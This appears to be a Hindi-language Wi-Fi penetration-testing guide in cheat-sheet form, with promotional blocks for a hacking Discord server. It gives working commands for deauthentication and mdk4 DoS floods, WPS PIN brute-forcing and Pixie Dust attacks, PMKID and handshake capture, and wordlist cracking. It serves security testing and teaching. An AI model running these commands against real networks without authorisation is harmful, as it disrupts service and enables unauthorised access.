Pentesting Wifi

अनुभवी हैकर्स और बग बाउंटी शिकारियों के साथ संवाद करने के लिए HackenProof Discord सर्वर में शामिल हों!

हैकिंग अंतर्दृष्टि हैकिंग के रोमांच और चुनौतियों में गहराई से जाने वाली सामग्री के साथ संलग्न हों

वास्तविक समय हैक समाचार वास्तविक समय की समाचार और अंतर्दृष्टि के माध्यम से तेज़-तर्रार हैकिंग दुनिया के साथ अद्यतित रहें

नवीनतम घोषणाएँ नवीनतम बग बाउंटी लॉन्च और महत्वपूर्ण प्लेटफ़ॉर्म अपडेट के साथ सूचित रहें

आज ही Discord पर हमसे जुड़ें और शीर्ष हैकर्स के साथ सहयोग करना शुरू करें!

Wifi बुनियादी कमांड

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

Tools

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

एयरगेडन

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

डॉकर के साथ एयरगेडन चलाएँ

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

From: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

यह Evil Twin, KARMA, और Known Beacons हमले कर सकता है और फिर नेटवर्क का असली पासवर्ड प्राप्त करने या सोशल नेटवर्क क्रेडेंशियल्स कैप्चर करने के लिए एक फ़िशिंग टेम्पलेट का उपयोग कर सकता है।

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

यह उपकरण WPS/WEP/WPA-PSK हमलों को स्वचालित करता है। यह स्वचालित रूप से:

• इंटरफ़ेस को मॉनिटर मोड में सेट करें

• संभावित नेटवर्क के लिए स्कैन करें - और आपको पीड़ित(ों) का चयन करने दें

• यदि WEP - WEP हमले शुरू करें

• यदि WPA-PSK

• यदि WPS: पिक्सी डस्ट हमला और ब्रूटफोर्स हमला (सावधान रहें, ब्रूट-फोर्स हमला लंबा समय ले सकता है)। ध्यान दें कि यह शून्य PIN या डेटाबेस/जनरेटेड PINs का प्रयास नहीं करता है।

• इसे क्रैक करने के लिए AP से PMKID कैप्चर करने का प्रयास करें

• एक हैंडशेक कैप्चर करने के लिए AP के क्लाइंट को डिऑथेंटिकेट करने का प्रयास करें

• यदि PMKID या हैंडशेक, तो शीर्ष 5000 पासवर्ड का उपयोग करके ब्रूटफोर्स करने का प्रयास करें।

Attacks Summary

• DoS

• डिऑथेंटिकेशन/डिसएसोसिएशन -- सभी को डिस्कनेक्ट करें (या एक विशिष्ट ESSID/क्लाइंट)

• यादृच्छिक नकली APs -- नेटवर्क छिपाएं, संभावित स्कैनर्स को क्रैश करें

• AP को ओवरलोड करें -- AP को मारने का प्रयास करें (आमतौर पर बहुत उपयोगी नहीं)

• WIDS -- IDS के साथ खेलें

• TKIP, EAPOL -- कुछ विशिष्ट हमले कुछ APs को DoS करने के लिए

• Cracking

• WEP क्रैक करें (कई उपकरण और विधियाँ)

• WPA-PSK

• WPS पिन "ब्रूट-फोर्स"

• WPA PMKID ब्रूटफोर्स

• [DoS +] WPA हैंडशेक कैप्चर + क्रैकिंग

• WPA-MGT

• यूजरनेम कैप्चर

• ब्रूटफोर्स क्रेडेंशियल्स

• ईविल ट्विन (DoS के साथ या बिना)

• ओपन ईविल ट्विन [+ DoS] -- कैप्टिव पोर्टल क्रेड्स कैप्चर करने और/या LAN हमले करने के लिए उपयोगी

• WPA-PSK ईविल ट्विन -- यदि आप पासवर्ड जानते हैं तो नेटवर्क हमलों के लिए उपयोगी

• WPA-MGT -- कंपनी के क्रेडेंशियल्स कैप्चर करने के लिए उपयोगी

• KARMA, MANA, लाउड MANA, जाने-माने बीकन

• + ओपन -- कैप्टिव पोर्टल क्रेड्स कैप्चर करने और/या LAN हमले करने के लिए उपयोगी

• + WPA -- WPA हैंडशेक कैप्चर करने के लिए उपयोगी

DOS

Deauthentication Packets

यहाँ से विवरण:.

डिऑथेंटिकेशन हमले, Wi-Fi हैकिंग में एक सामान्य विधि, "प्रबंधन" फ़्रेमों को जाली बनाने में शामिल होते हैं ताकि डिवाइस को नेटवर्क से बलात्कारी रूप से डिस्कनेक्ट किया जा सके। ये अनएन्क्रिप्टेड पैकेट क्लाइंट्स को यह विश्वास दिलाते हैं कि वे वैध नेटवर्क से हैं, जिससे हमलावरों को WPA हैंडशेक एकत्र करने या नेटवर्क कनेक्शनों को लगातार बाधित करने की अनुमति मिलती है। यह रणनीति, अपनी सरलता में चिंताजनक, व्यापक रूप से उपयोग की जाती है और नेटवर्क सुरक्षा के लिए महत्वपूर्ण निहितार्थ है।

Aireplay-ng का उपयोग करके डिऑथेंटिकेशन

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

• -0 का मतलब है डिअथेंटिकेशन

• 1 डिअथ्स की संख्या है जो भेजी जानी है (आप चाहें तो कई भेज सकते हैं); 0 का मतलब है उन्हें लगातार भेजना

• -a 00:14:6C:7E:40:80 एक्सेस पॉइंट का MAC पता है

• -c 00:0F:B5:34:30:30 क्लाइंट का MAC पता है जिसे डिअथेंटिकेट करना है; यदि इसे छोड़ दिया जाए तो ब्रॉडकास्ट डिअथेंटिकेशन भेजा जाता है (हमेशा काम नहीं करता)

• ath0 इंटरफेस का नाम है

डिसएसोसिएशन पैकेट्स

डिसएसोसिएशन पैकेट्स, डिअथेंटिकेशन पैकेट्स के समान, Wi-Fi नेटवर्क में उपयोग किए जाने वाले प्रबंधन फ्रेम का एक प्रकार हैं। ये पैकेट एक डिवाइस (जैसे लैपटॉप या स्मार्टफोन) और एक एक्सेस पॉइंट (AP) के बीच कनेक्शन को तोड़ने के लिए कार्य करते हैं। डिसएसोसिएशन और डिअथेंटिकेशन के बीच मुख्य अंतर उनके उपयोग के परिदृश्यों में है। जबकि एक AP नेटवर्क से बुरे डिवाइस को स्पष्ट रूप से हटाने के लिए डिअथेंटिकेशन पैकेट भेजता है, डिसएसोसिएशन पैकेट आमतौर पर तब भेजे जाते हैं जब AP शटडाउन, रीस्टार्ट, या स्थानांतरित हो रहा होता है, जिससे सभी जुड़े नोड्स का डिस्कनेक्शन आवश्यक हो जाता है।

यह हमला mdk4(mode "d") द्वारा किया जा सकता है:

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

mdk4 द्वारा अधिक DOS हमले

यहां यहां.

हमला मोड b: बीकन बाढ़

क्लाइंट्स पर नकली APs दिखाने के लिए बीकन फ़्रेम भेजता है। यह कभी-कभी नेटवर्क स्कैनर्स और यहां तक कि ड्राइवरों को भी क्रैश कर सकता है!

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: Authentication Denial-Of-Service

सभी सुलभ एक्सेस पॉइंट्स (APs) को ऑथेंटिकेशन फ्रेम भेजने से इन APs पर ओवरलोड हो सकता है, खासकर जब कई क्लाइंट शामिल होते हैं। यह तीव्र ट्रैफिक सिस्टम की अस्थिरता का कारण बन सकता है, जिससे कुछ APs फ्रीज या यहां तक कि रीसेट हो सकते हैं।

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

ATTACK MODE p: SSID Probing and Bruteforcing

Access Points (APs) की जांच करना यह सुनिश्चित करता है कि SSID सही तरीके से प्रकट किया गया है और AP की रेंज की पुष्टि करता है। यह तकनीक, छिपे हुए SSIDs को शब्द सूची के साथ या बिना शब्द सूची के ब्रूटफोर्स करने के साथ मिलकर, छिपे हुए नेटवर्क की पहचान और पहुंच में मदद करती है।

ATTACK MODE m: Michael Countermeasures Exploitation

विभिन्न QoS कतारों में यादृच्छिक या डुप्लिकेट पैकेट भेजने से TKIP APs पर माइकल काउंटरमेजर्स सक्रिय हो सकते हैं, जिससे एक मिनट के लिए AP बंद हो जाता है। यह विधि एक प्रभावी DoS (Denial of Service) हमले की रणनीति है।

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ATTACK MODE e: EAPOL Start और Logoff Packet Injection

एक AP को EAPOL Start फ्रेम के साथ बाढ़ में डालने से फर्जी सत्र बनते हैं, जो AP को ओवरलोड कर देते हैं और वैध क्लाइंट्स को ब्लॉक कर देते हैं। वैकल्पिक रूप से, फर्जी EAPOL Logoff संदेश इंजेक्ट करने से क्लाइंट्स को मजबूरन डिस्कनेक्ट किया जाता है, दोनों विधियाँ नेटवर्क सेवा को प्रभावी रूप से बाधित करती हैं।

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: IEEE 802.11s मेष नेटवर्क के लिए हमले

मेष नेटवर्क में लिंक प्रबंधन और रूटिंग पर विभिन्न हमले।

ATTACK MODE w: WIDS भ्रम

क्लाइंट्स को कई WDS नोड्स या नकली रॉग APs से क्रॉस-कनेक्ट करना Intrusion Detection और Prevention Systems को प्रभावित कर सकता है, जिससे भ्रम और संभावित सिस्टम दुरुपयोग उत्पन्न होता है।

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

ATTACK MODE f: Packet Fuzzer

एक पैकेट फज़्ज़र जिसमें विभिन्न पैकेट स्रोत और पैकेट हेरफेर के लिए एक व्यापक सेट के संशोधक शामिल हैं।

Airggedon

Airgeddon पिछले टिप्पणियों में प्रस्तावित अधिकांश हमलों की पेशकश करता है:

WPS

WPS (Wi-Fi Protected Setup) उपकरणों को राउटर से जोड़ने की प्रक्रिया को सरल बनाता है, WPA या WPA2 व्यक्तिगत के साथ एन्क्रिप्टेड नेटवर्क के लिए सेटअप की गति और आसानी को बढ़ाता है। यह आसानी से समझौता किए गए WEP सुरक्षा के लिए अप्रभावी है। WPS एक 8-अंकीय PIN का उपयोग करता है, जिसे दो भागों में मान्य किया जाता है, जिससे यह सीमित संयोजनों (11,000 संभावनाएँ) के कारण ब्रूट-फोर्स हमलों के प्रति संवेदनशील हो जाता है।

WPS Bruteforce

इस क्रिया को करने के लिए 2 मुख्य उपकरण हैं: Reaver और Bully।

• Reaver को WPS के खिलाफ एक मजबूत और व्यावहारिक हमले के लिए डिज़ाइन किया गया है, और इसे विभिन्न प्रकार के एक्सेस पॉइंट और WPS कार्यान्वयन के खिलाफ परीक्षण किया गया है।

• Bully WPS ब्रूट फोर्स हमले का नया कार्यान्वयन है, जो C में लिखा गया है। इसमें मूल रीवर कोड की तुलना में कई लाभ हैं: कम निर्भरताएँ, बेहतर मेमोरी और CPU प्रदर्शन, एंडियननेस का सही प्रबंधन, और विकल्पों का एक अधिक मजबूत सेट।

यह हमला WPS PIN की संवेदनशीलता का लाभ उठाता है, विशेष रूप से पहले चार अंकों के उजागर होने और अंतिम अंक की चेकसम के रूप में भूमिका, जिससे ब्रूट-फोर्स हमले को आसान बनाता है। हालाँकि, आक्रामक हमलावरों के MAC पते को ब्लॉक करने जैसे ब्रूट-फोर्स हमलों के खिलाफ रक्षा के लिए MAC पते का रोटेशन आवश्यक है ताकि हमले को जारी रखा जा सके।

Bully या Reaver जैसे उपकरणों के साथ WPS PIN प्राप्त करने पर, हमलावर WPA/WPA2 PSK का अनुमान लगा सकता है, जिससे स्थायी नेटवर्क पहुंच सुनिश्चित होती है।

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

स्मार्ट ब्रूट फोर्स

यह परिष्कृत दृष्टिकोण ज्ञात कमजोरियों का उपयोग करके WPS PINs को लक्षित करता है:

1. पूर्व-खोजे गए PINs: विशिष्ट निर्माताओं से जुड़े ज्ञात PINs का एक डेटाबेस उपयोग करें जो समान WPS PINs का उपयोग करते हैं। यह डेटाबेस MAC-पते के पहले तीन ऑक्टेट्स को इन निर्माताओं के लिए संभावित PINs के साथ सहसंबंधित करता है।

2. PIN जनरेशन एल्गोरिदम: ComputePIN और EasyBox जैसे एल्गोरिदम का लाभ उठाएं, जो AP के MAC-पते के आधार पर WPS PINs की गणना करते हैं। Arcadyan एल्गोरिदम को अतिरिक्त रूप से एक डिवाइस ID की आवश्यकता होती है, जो PIN जनरेशन प्रक्रिया में एक परत जोड़ती है।

WPS पिक्सी डस्ट हमला

डोमिनिक बोंगार्ड ने कुछ एक्सेस पॉइंट्स (APs) में गुप्त कोड बनाने के संबंध में एक दोष खोजा, जिसे नॉनसेस (E-S1 और E-S2) के रूप में जाना जाता है। यदि इन नॉनसेस का पता लगाया जा सकता है, तो AP के WPS PIN को क्रैक करना आसान हो जाता है। AP विशेष कोड (हैश) के भीतर PIN प्रकट करता है ताकि यह साबित हो सके कि यह वैध है और कोई नकली (रोग) AP नहीं है। ये नॉनसेस मूल रूप से "सुरक्षित" को "खोलने" के लिए "चाबियाँ" हैं जो WPS PIN को रखती हैं। इस पर अधिक जानकारी यहाँ मिल सकती है।

सरल शब्दों में, समस्या यह है कि कुछ APs ने कनेक्शन प्रक्रिया के दौरान PIN को एन्क्रिप्ट करने के लिए पर्याप्त यादृच्छिक चाबियाँ का उपयोग नहीं किया। इससे PIN को नेटवर्क के बाहर से अनुमानित करने के लिए कमजोर बना दिया गया है (ऑफलाइन ब्रूट फोर्स हमला)।

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

यदि आप डिवाइस को मॉनिटर मोड में स्विच नहीं करना चाहते हैं, या reaver और bully में कुछ समस्या है, तो आप OneShot-C आजमा सकते हैं। यह उपकरण Pixie Dust हमले को मॉनिटर मोड में स्विच किए बिना करने में सक्षम है।

./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin हमला

कुछ खराब डिज़ाइन किए गए सिस्टम एक Null PIN (खाली या गैर-मौजूद PIN) को एक्सेस देने की अनुमति देते हैं, जो कि काफी असामान्य है। उपकरण Reaver इस कमजोरी का परीक्षण करने में सक्षम है, इसके विपरीत Bully।

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

सभी प्रस्तावित WPS हमले airgeddon का उपयोग करके आसानी से किए जा सकते हैं।

• 5 और 6 आपको आपका कस्टम PIN आजमाने देते हैं (यदि आपके पास कोई है)

• 7 और 8 Pixie Dust हमले को अंजाम देते हैं

• 13 आपको NULL PIN का परीक्षण करने की अनुमति देता है

• 11 और 12 चुने गए AP से संबंधित PINs को उपलब्ध डेटाबेस से पुनः प्राप्त करेंगे और संभावित PINs उत्पन्न करेंगे: ComputePIN, EasyBox और वैकल्पिक रूप से Arcadyan (सिफारिश की गई, क्यों नहीं?)

• 9 और 10 हर संभावित PIN का परीक्षण करेंगे

WEP

अब यह बहुत टूटा हुआ और अप्रयुक्त है। बस जान लें कि airgeddon के पास इस प्रकार की सुरक्षा पर हमला करने के लिए "All-in-One" नाम का एक WEP विकल्प है। अधिक उपकरण समान विकल्प प्रदान करते हैं।

अनुभवी हैकरों और बग बाउंटी शिकारियों के साथ संवाद करने के लिए HackenProof Discord सर्वर में शामिल हों!

Hacking Insights हैकिंग के रोमांच और चुनौतियों में गहराई से जाने वाले सामग्री के साथ जुड़ें

Real-Time Hack News तेज-तर्रार हैकिंग दुनिया के साथ अद्यतित रहें वास्तविक समय की समाचार और अंतर्दृष्टि के माध्यम से

Latest Announcements नवीनतम बग बाउंटी लॉन्च और महत्वपूर्ण प्लेटफ़ॉर्म अपडेट के साथ सूचित रहें

Join us on Discord और आज ही शीर्ष हैकरों के साथ सहयोग करना शुरू करें!

WPA/WPA2 PSK

PMKID

2018 में, hashcat ने एक नया हमला विधि का खुलासा किया, जो अद्वितीय है क्योंकि इसे केवल एकल पैकेट की आवश्यकता होती है और इसे लक्ष्य AP से जुड़े किसी भी क्लाइंट की आवश्यकता नहीं होती—बस हमलावर और AP के बीच बातचीत।

कई आधुनिक राउटर संघ के दौरान पहले EAPOL फ्रेम में एक वैकल्पिक फ़ील्ड जोड़ते हैं, जिसे Robust Security Network के रूप में जाना जाता है। इसमें PMKID शामिल है।

जैसा कि मूल पोस्ट में बताया गया है, PMKID ज्ञात डेटा का उपयोग करके बनाया जाता है:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

यह देखते हुए कि "PMK नाम" स्थिर है, हमें AP और स्टेशन का BSSID पता है, और PMK एक पूर्ण 4-तरफा हैंडशेक से समान है, hashcat इस जानकारी का उपयोग PSK को क्रैक करने और पासफ़्रेज़ को पुनर्प्राप्त करने के लिए कर सकता है!

इस जानकारी को इकट्ठा करने और पासवर्ड को स्थानीय रूप से ब्रूटफोर्स करने के लिए आप कर सकते हैं:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

PMKIDs कैप्चर किए गए कंसोल में दिखाए जाएंगे और साथ ही /tmp/attack.pcap के अंदर भी सहेजे जाएंगे। अब, कैप्चर को hashcat/john प्रारूप में परिवर्तित करें और इसे क्रैक करें:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

कृपया ध्यान दें कि एक सही हैश का प्रारूप 4 भागों में होता है, जैसे: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838 यदि आपके पास केवल 3 भाग हैं, तो यह अमान्य है (PMKID कैप्चर मान्य नहीं था)।

ध्यान दें कि hcxdumptool हैंडशेक भी कैप्चर करता है (कुछ ऐसा दिखाई देगा: MP:M1M2 RC:63258 EAPOLTIME:17091)। आप हैंडशेक को hashcat/john प्रारूप में cap2hccapx का उपयोग करके परिवर्तित कर सकते हैं।

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

मैंने देखा है कि इस उपकरण के साथ कैप्चर किए गए कुछ हैंडशेक को सही पासवर्ड जानने के बावजूद क्रैक नहीं किया जा सका। मैं सुझाव दूंगा कि यदि संभव हो तो पारंपरिक तरीके से भी हैंडशेक कैप्चर करें, या इस उपकरण का उपयोग करके उनमें से कई कैप्चर करें।

हैंडशेक कैप्चर

WPA/WPA2 नेटवर्क पर एक हमला एक हैंडशेक को कैप्चर करके और पासवर्ड को ऑफलाइन क्रैक करने का प्रयास करके किया जा सकता है। इस प्रक्रिया में एक विशिष्ट नेटवर्क और BSSID के संचार की निगरानी करना शामिल है, एक विशेष चैनल पर। यहाँ एक संक्षिप्त मार्गदर्शिका है:

1. लक्ष्य नेटवर्क का BSSID, चैनल, और एक कनेक्टेड क्लाइंट पहचानें।

2. निर्दिष्ट चैनल और BSSID पर नेटवर्क ट्रैफ़िक की निगरानी करने के लिए airodump-ng का उपयोग करें, उम्मीद है कि एक हैंडशेक कैप्चर हो सके। कमांड इस तरह दिखेगा:

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

3. हैंडशेक कैप्चर करने के मौके को बढ़ाने के लिए, क्लाइंट को नेटवर्क से अस्थायी रूप से डिस्कनेक्ट करें ताकि पुनः प्रमाणीकरण को मजबूर किया जा सके। यह aireplay-ng कमांड का उपयोग करके किया जा सकता है, जो क्लाइंट को डिअथेंटिकेशन पैकेट भेजता है:

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

ध्यान दें कि जब क्लाइंट को डिऑथेंटिकेट किया गया, तो यह किसी अन्य AP से कनेक्ट करने की कोशिश कर सकता है या, अन्य मामलों में, किसी अन्य नेटवर्क से।

जब airodump-ng में कुछ हैंडशेक जानकारी दिखाई देती है, तो इसका मतलब है कि हैंडशेक कैप्चर किया गया था और आप सुनना बंद कर सकते हैं:

एक बार हैंडशेक कैप्चर हो जाने के बाद, आप इसे aircrack-ng के साथ क्रैक कर सकते हैं:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

फ़ाइल में हैंडशेक की जांच करें

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

यदि यह उपकरण किसी ESSID का अधूरा हैंडशेक पूर्ण हैंडशेक से पहले पाता है, तो यह मान्य हैंडशेक का पता नहीं लगाएगा।

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

WPA Enterprise (MGT)

एंटरप्राइज वाईफाई सेटअप में, आप विभिन्न प्रमाणीकरण विधियों का सामना करेंगे, प्रत्येक विभिन्न सुरक्षा स्तरों और प्रबंधन सुविधाओं को प्रदान करती है। जब आप नेटवर्क ट्रैफ़िक का निरीक्षण करने के लिए airodump-ng जैसे उपकरणों का उपयोग करते हैं, तो आप इन प्रमाणीकरण प्रकारों के लिए पहचानकर्ता देख सकते हैं। कुछ सामान्य विधियों में शामिल हैं:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

1. EAP-GTC (Generic Token Card):

• यह विधि हार्डवेयर टोकन और EAP-PEAP के भीतर एक-बार पासवर्ड का समर्थन करती है। MSCHAPv2 के विपरीत, यह एक पीयर चुनौती का उपयोग नहीं करती है और पासवर्ड को एक्सेस पॉइंट पर स्पष्ट रूप में भेजती है, जो डाउनग्रेड हमलों के लिए जोखिम पैदा करती है।

2. EAP-MD5 (Message Digest 5):

• इसमें क्लाइंट से पासवर्ड का MD5 हैश भेजना शामिल है। यह सिफारिश नहीं की जाती है क्योंकि यह शब्दकोश हमलों के प्रति संवेदनशील है, सर्वर प्रमाणीकरण की कमी है, और सत्र-विशिष्ट WEP कुंजी उत्पन्न करने में असमर्थ है।

3. EAP-TLS (Transport Layer Security):

• प्रमाणीकरण के लिए क्लाइंट-साइड और सर्वर-साइड प्रमाणपत्रों का उपयोग करता है और संचार को सुरक्षित करने के लिए उपयोगकर्ता-आधारित और सत्र-आधारित WEP कुंजी गतिशील रूप से उत्पन्न कर सकता है।

4. EAP-TTLS (Tunneled Transport Layer Security):

• एक एन्क्रिप्टेड टनल के माध्यम से आपसी प्रमाणीकरण प्रदान करता है, साथ ही उपयोगकर्ता-विशिष्ट, सत्र-विशिष्ट WEP कुंजी निकालने की विधि भी। यह केवल सर्वर-साइड प्रमाणपत्रों की आवश्यकता होती है, जिसमें क्लाइंट क्रेडेंशियल्स का उपयोग करते हैं।

5. PEAP (Protected Extensible Authentication Protocol):

• यह EAP के समान कार्य करता है, सुरक्षित संचार के लिए एक TLS टनल बनाता है। यह टनल द्वारा प्रदान की गई सुरक्षा के कारण EAP के शीर्ष पर कमजोर प्रमाणीकरण प्रोटोकॉल के उपयोग की अनुमति देता है।

• PEAP-MSCHAPv2: इसे अक्सर PEAP के रूप में संदर्भित किया जाता है, यह कमजोर MSCHAPv2 चुनौती/प्रतिक्रिया तंत्र को एक सुरक्षात्मक TLS टनल के साथ जोड़ता है।

• PEAP-EAP-TLS (या PEAP-TLS): EAP-TLS के समान है लेकिन प्रमाणपत्रों का आदान-प्रदान करने से पहले एक TLS टनल शुरू करता है, जो सुरक्षा की एक अतिरिक्त परत प्रदान करता है।

आप इन प्रमाणीकरण विधियों के बारे में अधिक जानकारी यहां और यहां पा सकते हैं।

Username Capture

https://tools.ietf.org/html/rfc3748#page-27 को पढ़ने पर ऐसा लगता है कि यदि आप EAP का उपयोग कर रहे हैं तो "Identity" messages का समर्थन होना चाहिए, और username "Response Identity" संदेशों में स्पष्ट रूप से भेजा जाएगा।

यहां तक कि सबसे सुरक्षित प्रमाणीकरण विधियों में से एक: PEAP-EAP-TLS का उपयोग करते समय भी, EAP प्रोटोकॉल में भेजे गए username को कैप्चर करना संभव है। ऐसा करने के लिए, एक प्रमाणीकरण संचार कैप्चर करें (एक चैनल के भीतर airodump-ng शुरू करें और उसी इंटरफेस में wireshark) और पैकेट को eapol द्वारा फ़िल्टर करें। "Response, Identity" पैकेट के भीतर, क्लाइंट का username दिखाई देगा।

Anonymous Identities

पहचान छिपाना EAP-PEAP और EAP-TTLS दोनों द्वारा समर्थित है। WiFi नेटवर्क के संदर्भ में, EAP-Identity अनुरोध आमतौर पर एसोसिएशन प्रक्रिया के दौरान एक्सेस पॉइंट (AP) द्वारा शुरू किया जाता है। उपयोगकर्ता की गुमनामी की सुरक्षा सुनिश्चित करने के लिए, उपयोगकर्ता के डिवाइस पर EAP क्लाइंट से प्रतिक्रिया में केवल प्रारंभिक RADIUS सर्वर द्वारा अनुरोध को संसाधित करने के लिए आवश्यक जानकारी होती है। इस अवधारणा को निम्नलिखित परिदृश्यों के माध्यम से दर्शाया गया है:

• EAP-Identity = anonymous

• इस परिदृश्य में, सभी उपयोगकर्ता अपने उपयोगकर्ता पहचानकर्ता के रूप में उपनाम "anonymous" का उपयोग करते हैं। प्रारंभिक RADIUS सर्वर या तो EAP-PEAP या EAP-TTLS सर्वर के रूप में कार्य करता है, जो PEAP या TTLS प्रोटोकॉल के सर्वर-साइड का प्रबंधन करता है। आंतरिक (सुरक्षित) प्रमाणीकरण विधि फिर या तो स्थानीय रूप से संभाली जाती है या एक दूरस्थ (होम) RADIUS सर्वर को सौंप दी जाती है।

• EAP-Identity = anonymous@realm_x

• इस स्थिति में, विभिन्न क्षेत्रों के उपयोगकर्ता अपनी पहचान छिपाते हैं जबकि अपने संबंधित क्षेत्रों का संकेत देते हैं। यह प्रारंभिक RADIUS सर्वर को EAP-PEAP या EAP-TTLS अनुरोधों को उनके होम क्षेत्रों में RADIUS सर्वरों को प्रॉक्सी करने की अनुमति देता है, जो PEAP या TTLS सर्वर के रूप में कार्य करते हैं। प्रारंभिक RADIUS सर्वर केवल एक RADIUS रिले नोड के रूप में कार्य करता है।

• वैकल्पिक रूप से, प्रारंभिक RADIUS सर्वर EAP-PEAP या EAP-TTLS सर्वर के रूप में कार्य कर सकता है और या तो सुरक्षित प्रमाणीकरण विधि को संभाल सकता है या इसे किसी अन्य सर्वर को अग्रेषित कर सकता है। यह विकल्प विभिन्न क्षेत्रों के लिए विशिष्ट नीतियों की कॉन्फ़िगरेशन की सुविधा प्रदान करता है।

EAP-PEAP में, एक बार जब PEAP सर्वर और PEAP क्लाइंट के बीच TLS टनल स्थापित हो जाती है, तो PEAP सर्वर एक EAP-Identity अनुरोध शुरू करता है और इसे TLS टनल के माध्यम से भेजता है। क्लाइंट इस दूसरे EAP-Identity अनुरोध का उत्तर EAP-Identity प्रतिक्रिया भेजकर देता है, जिसमें उपयोगकर्ता की वास्तविक पहचान एन्क्रिप्टेड टनल के माध्यम से होती है। यह दृष्टिकोण 802.11 ट्रैफ़िक पर किसी भी व्यक्ति को उपयोगकर्ता की वास्तविक पहचान प्रकट करने से प्रभावी रूप से रोकता है।

EAP-TTLS एक थोड़ी अलग प्रक्रिया का पालन करता है। EAP-TTLS के साथ, क्लाइंट आमतौर पर PAP या CHAP का उपयोग करके प्रमाणीकरण करता है, जो TLS टनल द्वारा सुरक्षित होता है। इस मामले में, क्लाइंट प्रारंभिक TLS संदेश में एक User-Name विशेषता और या तो एक Password या CHAP-Password विशेषता शामिल करता है जो टनल स्थापना के बाद भेजा जाता है।

